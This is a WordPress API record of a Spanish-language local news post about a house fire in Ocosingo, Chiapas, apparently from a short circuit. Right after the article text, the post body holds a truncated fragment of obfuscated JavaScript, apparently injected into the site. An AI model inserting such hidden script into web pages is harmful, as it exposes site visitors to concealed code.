{"id":23216,"date":"2025-07-29T04:11:05","date_gmt":"2025-07-29T04:11:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23216"},"modified":"2025-07-29T04:11:06","modified_gmt":"2025-07-29T04:11:06","slug":"se-incendia-vivienda-en-el-barrio-santa-rita","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23216","title":{"rendered":"Se incendia vivienda en el barrio Santa Rita"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249334-1024x768.jpg\" alt=\"\" class=\"wp-image-23217\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249334-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249334-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249334-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000249334.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>28 de julio del 2025. Ocosingo, Chiapas.\u2013 Una vivienda fue consumida en su totalidad por el fuego en el barrio Santa Rita. Al lugar acudi\u00f3 personal de Protecci\u00f3n Civil, quienes colaboraron en el retiro de escombros.<\/p>\n\n\n\n<p>Aunque se desconocen las causas exactas del siniestro, se presume que pudo tratarse de un cortocircuito, lo que provoc\u00f3 la p\u00e9rdida total del patrimonio de una familia.<\/p>\n\n\n\n<p>Trascendi\u00f3 que autoridades municipales brindar\u00e1n apoyo a la familia afectada para la reconstrucci\u00f3n de su vivienda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal28 de julio del 2025. Ocosingo, Chiapas.\u2013 Una vivienda fue consumida en su totalidad por el fuego en el barrio Santa Rita. Al lugar acudi\u00f3 personal de Protecci\u00f3n Civil, quienes colaboraron en el retiro de escombros. Aunque se desconocen las causas exactas del siniestro, se presume que pudo tratarse de un cortocircuito, lo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23217,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23216","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23216","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23216"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23216\/revisions"}],"predecessor-version":[{"id":23218,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23216\/revisions\/23218"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23217"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}